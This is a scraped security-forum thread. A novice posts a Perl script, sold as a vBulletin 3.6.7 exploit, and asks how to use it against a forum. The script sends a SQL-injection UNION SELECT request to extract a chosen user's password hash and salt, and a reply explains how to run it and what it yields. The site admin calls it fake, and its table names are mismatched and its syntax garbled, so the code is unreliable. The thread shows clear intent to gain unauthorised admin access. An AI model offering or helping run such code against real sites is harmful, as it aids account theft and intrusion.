Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
May 25, 2012
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: jimysakura
New Today: 0
New Yesterday: 3
Overall: 8201

People Online:
Visitors: 214
Members: 1
Total: 215

Online Now:
01: vince213333 - Forums
milw0rm
·[webapps / 0day] - appRain CMF Arbitrary PHP File Upload Vulnerability
·[local exploits] - OpenOffice OLE Importer DocumentSummaryInformatio n Stream Handling
·[local exploits] - Mod_Auth_OpenID Session Stealing Vulnerability
·[dos / poc] - Symantec End Point Protection 11.x & Symantec Network Access Control 11.x LCE
·[dos / poc] - Tftpd32 DHCP Serve 4.00 Denial Of Service
·[webapps / 0day] - Ajaxmint Gallery 1.0 Local File Inclusion
·[webapps / 0day] - RuubikCMS 1.1.0 Beta XSS / Disclosure / Directory Traversal
·[webapps / 0day] - Insight Creative Sql injection/Reflected XSS Vulnerabilties
·[webapps / 0day] - AFFY (index.php) Blind Sql Injection Vulnerability
·[webapps / 0day] - ezContents (1.x.x , 2.0.3) Blind injection/Reflected XSS Vulnerabilties

read more...
PacketStorm News
·Mandriva Linux Security Advisory 2012-080
·Red Hat Security Advisory 2012-0688-01
·Debian Security Advisory 2479-1
·Debian Security Advisory 2478-1
·Ubuntu Security Notice USN-1450-1
·Drupal BrowserID 7.x Cross Site Request Forgery
·Drupal Taxonomy List 6.x Cross Site Scripting
·Drupal Search API 7.x Cross Site Scripting
·Secunia Security Advisory 49200
·Secunia Security Advisory 49235

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> vBulletin Board -> vBulletin 3.6.7 Exploit help needed
Post new topic  Reply to topic View previous topic :: View next topic 
vBulletin 3.6.7 Exploit help needed
PostPosted: Thu Jan 21, 2010 11:05 am Reply with quote
magicmonkey
Regular user
Regular user
 
Joined: Jan 21, 2010
Posts: 7




I'm a newbee I found the below exploit, but without sounding dumb, how do I use it? Thanks in-advance.

!/usr/bin/perl

use IO::Socket;

if (!$ARGV[2]) {

print q{
Usage: perl vbulletin.pl host /directory/ victim_userid

perl vbulletin.pl www.somesite.com /forum/ 1


};

}


$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];

print" __ \r\n";
print" /|/| / / / | / \r\n";
print"( / | ___ ( ___ (___| ___ ___ ( ___ ___ ___ \r\n";
print"| )| )|___ | | ) | )| )| |___)|___)| ) __/ \r\n";
print"| / |__/|| | |__/| | / |__/||__ | \ |__ | /__ \r\n\r\n";
print "--------------------------------------------------------------------------------\r\n\r\n";
print "--------------------------------------[Usage]-----------------------------------\r\n\r\n";
print " Eg: localhost / 1 Eg2: localhost /vb3/ 5 \r\n\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print " \r\n\r\n";
print "--------------------------------------------------------------------------------\r\n\r\n";
print "--------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http://)//eg;

$path = $dir;
$path .=

"misc.php?sub=profile&****=0')+UNION+SELECT+0,salt,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

20WHERE%20(uid='".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$server", PeerPort => "80") || die "[-]
CONNECTION FAILED OR YOU DIDNT SPECIFY A SITE";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT
]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

if ($answer =~/(w{32})/)
{

if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print
"--------------------------------------------------------------------------------------\r\n";

}
exit();
}

}
print
"----------------------This forum isnt Vulnerable, or incorrect path----------\r\n";

#########################################################
# ahm3d #
# #
# ... #
# #
# #
# #
# #
#########################################################
View user's profile Send private message
PostPosted: Thu Jan 21, 2010 11:17 am Reply with quote
AIR_Nayden
Advanced user
Advanced user
 
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




in command prompt

perl PATH_TO_EXPLOUIT

but you have to have PERL installed Wink

where did you get this from?
View user's profile Send private message
PostPosted: Thu Jan 21, 2010 11:24 am Reply with quote
magicmonkey
Regular user
Regular user
 
Joined: Jan 21, 2010
Posts: 7




here http://www.alm3refh.com/vb/t11139.html

what will happen when I run the script?
View user's profile Send private message
PostPosted: Thu Jan 21, 2010 11:36 am Reply with quote
AIR_Nayden
Advanced user
Advanced user
 
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




u will execute the code in your exploit...... and if you have set the arguments right and you have a vulnerable forum you'll be able to extract hash and salt
View user's profile Send private message
PostPosted: Thu Jan 21, 2010 11:40 am Reply with quote
magicmonkey
Regular user
Regular user
 
Joined: Jan 21, 2010
Posts: 7




and with them i used be able to create the admin pw?
View user's profile Send private message
PostPosted: Thu Jan 21, 2010 12:27 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2399
Location: Estonia, Tartu




This exploit is fake, don't waste your time Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jan 22, 2010 6:07 am Reply with quote
magicmonkey
Regular user
Regular user
 
Joined: Jan 21, 2010
Posts: 7




thanks for the heads up, are there any exploits for 3.6.7 out there?
View user's profile Send private message
vBulletin 3.6.7 Exploit help needed
  www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2010 Janek Vind "waraxe"

Page Generation: 0.090 Seconds